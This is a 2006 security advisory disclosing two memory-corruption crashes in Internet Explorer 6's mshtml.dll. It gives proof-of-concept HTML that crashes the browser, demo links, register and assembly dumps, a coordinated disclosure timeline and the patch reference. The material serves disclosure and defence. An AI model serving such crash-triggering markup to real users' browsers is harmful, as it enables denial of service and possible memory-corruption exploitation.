-----BEGIN PGP SIGNED MESSAGE----- Hash: RIPEMD160
--------------------------------------------------- | BuHa Security-Advisory #13 | May 25th, 2006 | --------------------------------------------------- | Vendor | MS Internet Explorer 6.0 | | URL | http://www.microsoft.com/windows/ie/ | | Version | <= 6.0.2900.2180.xpsp_sp2 | | Risk | Critical (Memory Corruption) | --------------------------------------------------- The Microsoft Security Response Center rated following issues as critical because, on the face of it, they could produce an exploitable memory corruption (see HTML Tag Memory Corruption Vulnerability - CVE-2006-1188 [1]) with a variant of my PoC. o Description: ============= Internet Explorer, abbreviated IE or MSIE, is a proprietary web browser made by Microsoft and currently available as part of Microsoft Windows. Visit http://www.microsoft.com/windows/ie/default.mspx or http://en.wikipedia.org/wiki/Internet_Explorer for detailed information. o Memory Corruption Vulnerability: <mshtml.dll>#7d519030 ================================= Following HTML code forces IE 6 to crash: > <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" > "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd";> > <html> <fieldset> <h4> > <pre><td> > <menu> > <legend> > <a> > <ul> > <small> > <fieldset> > <h6> > </h6 > </u> > </optgroup> > </tr> > </map> > </ul > </dfn> > > </del> > </h2> > </dir> > </ul> Online-demo: http://morph3us.org/security/pen-testing/msie/ie60-1135035582812-7d519030.html These are the register values and the ASM dump at the time of the access violation: > eax=00000000 ebx=0012e88c ecx=00000000 edx=0012e7c0 esi=00000000 > edi=00000004 eip=7d519030 esp=0012e780 ebp=0012e894 > > 7d519012 55 push ebp > 7d519013 8bec mov ebp,esp > 7d519015 8b4104 mov eax,[ecx+0x4] > 7d519018 394508 cmp [ebp+0x8],eax > 7d51901b 7c09 jl mshtml+0x69026 (7d519026) > 7d51901d 7edc jle mshtml+0x68ffb (7d518ffb) > 7d51901f 33c0 xor eax,eax > 7d519021 40 inc eax > 7d519022 5d pop ebp > 7d519023 c20800 ret 0x8 > 7d519026 83c8ff or eax,0xffffffff > 7d519029 ebf7 jmp mshtml+0x69022 (7d519022) > 7d51902b 90 nop > 7d51902c 90 nop > 7d51902d 90 nop > 7d51902e 90 nop > 7d51902f 90 nop > FAULT ->7d519030 8b4108 mov eax,[ecx+0x8] > ds:0023:00000008=???????? > 7d519033 85c0 test eax,eax > 7d519035 7425 jz mshtml+0x6905c (7d51905c) > 7d519037 8b10 mov edx,[eax] > 7d519039 f6c210 test dl,0x10 > 7d51903c 7408 jz mshtml+0x69046 (7d519046) > 7d51903e f6c220 test dl,0x20 > 7d519041 7519 jnz mshtml+0x6905c (7d51905c) > 7d519043 8b400c mov eax,[eax+0xc] > 7d519046 8b4808 mov ecx,[eax+0x8] > 7d519049 85c9 test ecx,ecx o Memory Corruption Vulnerability: <mshtml.dll>#7d529d35 ================================= Following HTML code forces IE 6 to crash: > <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" > "http://www.w3.org/TR/html4/loose.dtd";> > <bdo> > </span> > <pre> > > <param> > <form> > <colgroup> > <small> > </small> > </colgroup> > </map> > </button> > </code > > <blockquote> > <th> > <small> > > </tbody> > </tr> > </ol> > </tbody> > </ol> > </code> > </strong> > > > <head> > <fieldset> > <style> > > </style > </dir> > </a> > </td > </li> > </label > </object> > </bdo > </th > </object > </q> > > <ol> > <object> Online-demo: http://morph3us.org/security/pen-testing/msie/ie60-1135042070015-7d529d35.html These are the register values and the ASM dump at the time of the access violation: > eax=00000000 ebx=0012e88c ecx=00000000 edx=00000012 esi=00e7dbb0 > edi=00000002 eip=7d529d35 esp=0012e778 ebp=0012e778 > > 7d529d0e e811170000 call mshtml+0x7b424 (7d52b424) > 7d529d13 85c0 test eax,eax > 7d529d15 0f85c5500800 jne mshtml!DllGetClassObject+0x10fa2 > (7d5aede0) > 7d529d1b 0fb65508 movzx edx,byte ptr [ebp+0x8] > 7d529d1f 8d849680000000 lea eax,[esi+edx*4+0x80] > 7d529d26 5e pop esi > 7d529d27 5d pop ebp > 7d529d28 c20c00 ret 0xc > 7d529d2b 90 nop > 7d529d2c 90 nop > 7d529d2d 90 nop > 7d529d2e 90 nop > 7d529d2f 90 nop > 7d529d30 8bff mov edi,edi > 7d529d32 55 push ebp > 7d529d33 8bec mov ebp,esp > FAULT ->7d529d35 0fbe4114 movsx eax,byte ptr [ecx+0x14] > ds:0023:00000014=?? > 7d529d39 c1e004 shl eax,0x4 > 7d529d3c 0578aa4b7d add eax,0x7d4baa78 > 7d529d41 7410 jz mshtml+0x79d53 (7d529d53) > 7d529d43 8b400c mov eax,[eax+0xc] > 7d529d46 234508 and eax,[ebp+0x8] > 7d529d49 f7d8 neg eax > 7d529d4b 1bc0 sbb eax,eax > 7d529d4d f7d8 neg eax > 7d529d4f 5d pop ebp > 7d529d50 c20400 ret 0x4 > 7d529d53 33c0 xor eax,eax > 7d529d55 ebf8 jmp mshtml+0x79d4f (7d529d4f) o Vulnerable versions: ===================== The DoS vulnerability was successfully tested on: > MS IE 6 SP2 - Win XP Pro SP2 > MS IE 6 - Win 2k SP4 o Disclosure Timeline: ===================== xx Feb 06 - Vulnerabilities discovered. 08 Mar 06 - Vendor contacted. 22 Mar 06 - Vendor confirmed vulnerabilities. 25 May 06 - Public release. o Solution: ========== Install the latest security update (MS06-013) for Internet Explorer [2]. o Credits: ========= Thomas Waldegger <[EMAIL PROTECTED]> BuHa-Security Community - http://buha.info/board/ If you have questions, suggestions or criticism about the advisory feel free to send me a mail. The address '[EMAIL PROTECTED]' is more a spam address than a regular mail address therefore it's possible that some mails get ignored. Please use the contact details at http://morph3us.org/ to contact me. Greets fly out to cyrus-tc, destructor, nait, rhy, trappy and all members of BuHa. Advisory online: http://morph3us.org/advisories/20060525-msie6-sp2-2.txt [1] http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-1188 [2] http://www.microsoft.com/technet/security/Bulletin/MS06-013.mspx - -- Don't you feel the power of CSS Layouts? BuHa-Security Community: http://buha.info/board/ -----BEGIN PGP SIGNATURE----- Version: n/a Comment: http://morph3us.org/ iD8DBQFEdjSQkCo6/ctnOpYRA9qlAJ9CfZxTO0qAs+6O12hmutZ6eeHoMwCghkd2 vrVBfqAxWpoJ9Ny1W8OAtEw= =M5nj -----END PGP SIGNATURE-----
